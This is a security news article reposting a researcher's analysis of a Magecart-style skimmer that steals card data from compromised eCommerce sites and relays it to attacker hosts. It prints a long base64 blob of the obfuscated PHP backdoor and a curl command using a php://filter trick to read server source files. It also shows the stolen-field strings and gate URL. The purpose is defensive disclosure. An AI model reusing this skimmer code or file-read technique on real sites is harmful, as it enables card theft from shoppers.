Cyber Crime

Uncovering New Magecart Implant Attacking eCommerce

Security expert Marco Ramilli shared the results of an analysis of a skimmer implant spotted in the wild that could be potentially linked to Magecart group.

If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

Disclaimer

National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

Analysis

Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.%5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands to an external gate hosted on *****.]com. This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZGRGQvMEhoTU45R2lyR2k2SmZIYjAwdG5mbzZVdmg0MVZPUDBqU1Nia1dWTXpkK2ZZWXpzZkh3d1ZzSHh4N2ZPWEgwMi9mdkhidjNkT2E3cUJwVXhMYmY3aThjbjMvL2p1ZDA1WExyRE1qVmk2c3pHaGlLM1NmL1B2dm03d2N2SngrODl3UngyUnRUWHRQRzhidGk2NVdsbTRmdkg1cSs5SDdhRjArUC84VG40U042Z0NaN2I2N1I3cFZPTjZ6VGxTUDNNdGRLNnk1OUtVSjhyV05kL3c4L3Z6ait3OHloOTdQSTU5T3gyRGdSbTd1OWtraDV4cVZ1bVpjaHpFbEtXZHVLQTN5NWc4d2RPbjEyN3RuN1pUcnpqR3FraFhuSXhQQXNDSkx5SFVHeDNQbTI4eUVWTDMwcG9vRjdGTlIxMUZUbmRPUTZBMGxuZTl1ZTl0WTkyOXVhUzNDSlNzb3R1bWgrZU51VDRpT1NsRXVqUzRwbTNwWUxJUVRibC82NGR2bUhIOGF1Ly9SK3pzVU40YVZMYis4c0NTTSttNXUrOFdqcTZ0djNiL3M4T2hKT1RFNWRpQVprQklQQjZLNWsvcVNRdUJoNjYvcS9tUDdwMm92bjd6L3FQZzBjY1U1NDh0d0N2enZrYkJ5OU9IWDc3STFiYXpvaDNRZEM2OEZKdUhFOVhZeWNGL3N2SG52NTZ2VC80Qi8xeWd4ZEdmSTlYeDQ5Zm01eC9QM2N2cVpwdEhZdnFzcWhDYkhyd2FYeE4rZmZ2K244eSs4V1o4WHE2OCttRDVCdU81czY5alIxckxxYWJobWpxaWEvOGJhOGVEbjU1SmU1eDQrTHc2RGx0MWJkLzgzTmwrTjA3Ymc0OWdBSFJFcHhaSzJ0ZEQxeDllQS8zNzY2SUhaNjBMWFd0dWQzRC96KzRPUmp1alFWK3dwSXNNWkdNdURFNHBHZjZYcVI3K1BRNVY5MS9qTDE0dURTdjVmNDlLNElVV3NkRHd2L2MvQVdzQzc0ZE9Ld29PQWh4Ly9BbUhjRCtNMzhTN0ZUNE1DS0w2TzVWczVJOHJnczFQcG9GRnlBUjUwWHJBNnY3Nmc1UkZtckE4QVF5cDFJRUdhZVE5bWFiSWpid3h0ams2OW15a1R3djBQaTZYT0hyajljNElyeVdGN0Rlb3VQWnVrMmtjTDRpS0RBWFhxdGJXL0dYejJoRzBPb1Y3djhwOWhZQkowVmF1S0RkYTRlK2k0SjNmeldGZW9aR2gweDZnUFRLTmVBajNUUkJtQWNzSFcwVm12cXFQLzB4Q3hkUFhMNkhtcXM3ZVlOTVlGYTlmV0xsQXJQaWUwQ3JsYUFkak54Z2dLWk9kUXdJbDJZS01UNW9KaFhVMzQrRFMzRGRZN0lOTzhROHhFemxSRXlHUWhoeXhVZHdHak9NSkkwUUZoYlJISERDVWJEMDRMUkFraFhxQmxPVmp5VjAyS093NXppSkpaSXIwM3M1c25YNUhCTFJ3OElXaHhKS3dodDFkTVozaGQ2VldCcUlPbDYwejRxY2FuR2FtbnZXcHZXL0RjbmY3eExkNkdja3NCZk10Nk5INStjdm5veXNsbDM2SnVVckcyTHRaVlY3M2VzdHY2bU5vT2VMNS9yODVWc1FHSEkyb3gyc1VDOFJ4OHYxNk9SMWFzaE5heWQrSHA2QXFnWm9zdkQyUWtlUHQ0Sjd3bzB4S1dtSHI4eVIxODdlZmdFTzBDOXFZMS82ZFBEZWQrcVVEWXpSdGxPM0x3aWo0UTVyZmZrQStKS1hNWWlIWlNNQVZkZlc4OHVuN3FIK2s3Vy91Smo2cEpPWm9WajgzYVBHVWxMV24zc0kydmk3dlhMQldoSW1RU2pPOTErZXhOZC9LRHRXUytIZytqMVFrRTVyRlJjOU93VThaSEtPdkI5eDBXVFRaVUpiMnF0aENzWmRyNTRRMkNpci9EVEJqRkhjVVJnMFJTUG1RenJkR3EzY3huMHNrNVNUTFhzdFBoV2lac3lCdk0wdHpGVENaT1BNNmljb3VPb2xTRytna0c1VXVUbFRoYk5wT2dGOEpEVzQyWXE1b2daQzNvaFY1ZlE4QmNQVXBSUXhVVmVMM1Ztd3pTcDNvNDRGeFdreHlTaldVVXBXM1Y4dk1MYkp6R3NwZ0d3TjlIT1pZdGZxS01yTUwvVWhwWitlVGpsTU9obWMwME5MM3Ryb1hSWmxlV3c3MTBlU1FWOTRPS0x1YVhmNy9QcjhpcGZZMGtuMHZqL2ZlODJwdz09JykpKTs=

We are now facing an initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “touch” which would activate the process in both flavors: GET and POST. Once the activation variable is found a compressed and encoded payload is fitted into a multiple variable concatenation chain and later executed (eval).

Fig2: Payload Stage 1

By following the reverse obfuscation order chain we will end-up in having the following code (Fig3). This time the attacker used more obfuscation techniques: from charset differentiation, junk code to spear random comments making quite hard the overall reading. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset I was able to extract the decoding loop and to quickly understand the Payload behavior

Fig3: Payload Stage 3

Indeed, once the script decodes the received payload (by rotating on charsets with hard-coded strings) from the compromised eCommerce (Fig3 decodes touch variable content), every stolen field is ordered into a crafted object and is sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section would help us to understand the execution chain.

REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;

We actually have one more host that need to be analyzed. By taking a closer look to the used domain, we might agree that it looks like the ending proxy gate which stores data on a given database (mongodb). Again by enumerating and seeking inside its public information it was actually possible to spot and to enumerate the used technology to store the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory – used to store temporary files between the attacker infrastructure – I was able to build up a simple monitoring script which revealed the most used compromised eCommerce.

Attack Magnitude

From the command and control host we might observe what is actually passing through it, but we might have no idea about the overall magnitude of the infection chain since many eCommerces could have a low selling rate (rate of customers during my monitoring phase). In this case even if they are compromised, it is very hard to discover every compromised eCommerce by using this technique: looking, converting and importing temporary files generated every time a data leak happens (every time a user adds his credit card). So we might ending up with another method. Fortunately the host reserved a PTR (Pointer Record) to mo-------.]fvds].ru as shown on Fig4.

Fig4: PTR on ^^^^^^.su

The new host (mo-------) definitely recall the mag^^^^^^.]su registered email address (mo------@protonmail.]com) in an unique way. BTW It is active since 2019-07!!

Fig5: registered eMail Address

According to URLSCAN, using the PTR record in order to understand how many known websites have links pointing to mo-----.]fvds.]ru, you might find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce. Now, I am not saying that every single eCommerce in the list has been compromised, but taking randomly 3 of them (and reported in IoC section) I found the exact infection chain on each one. So potentially every eCommerce on that list (so that points to the command and control) should be checked.

Fig6: Link on m——–fvds.]ru

According to urlscan.io most of the websites pointing to momo--------s.]ru respect the following geographic distribution (Fig7). Most of all are US based followed by RU, NL and IN. While it’s hard to say that it is a targeted attack against US eCommerce websites, stats (Fig7) are surprisingly talkative.

Fig7: Location of Possible Compromised eCommerce

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Published by
Pierluigi Paganini
Tags: credit cardsCybercrimeHackinghacking newsMageCartPierluigi PaganiniSecurity AffairsSecurity Newssoftware skimmer
4 years ago

Recent Posts

Russia is trying to sabotage European railways, Czech minister said

Czech transport minister warned that Russia conducted ‘thousands’ of attempts to sabotage railways, attempting to…

39 mins ago

Ransomware group Dark Angels claims the theft of 1TB of data from chipmaker Nexperia

The Dark Angels (Dunghill) ransomware group claims the hack of the chipmaker Nexperia and the…

3 hours ago

Cisco Duo warns telephony supplier data breach exposed MFA SMS logs

Cisco Duo warns that a data breach involving one of its telephony suppliers exposed multifactor…

13 hours ago

Ukrainian Blackjack group used ICS malware Fuxnet against Russian targets

The Ukrainian hacking group Blackjack used a destructive ICS malware dubbed Fuxnet in attacks against…

14 hours ago

CISA adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Palo Alto Networks PAN-OS Command Injection flaw…

21 hours ago

Threat actors exploited Palo Alto Pan-OS issue to deploy a Python Backdoor

Threat actors have been exploiting the recently disclosed zero-day in Palo Alto Networks PAN-OS since…

22 hours ago

This website uses cookies.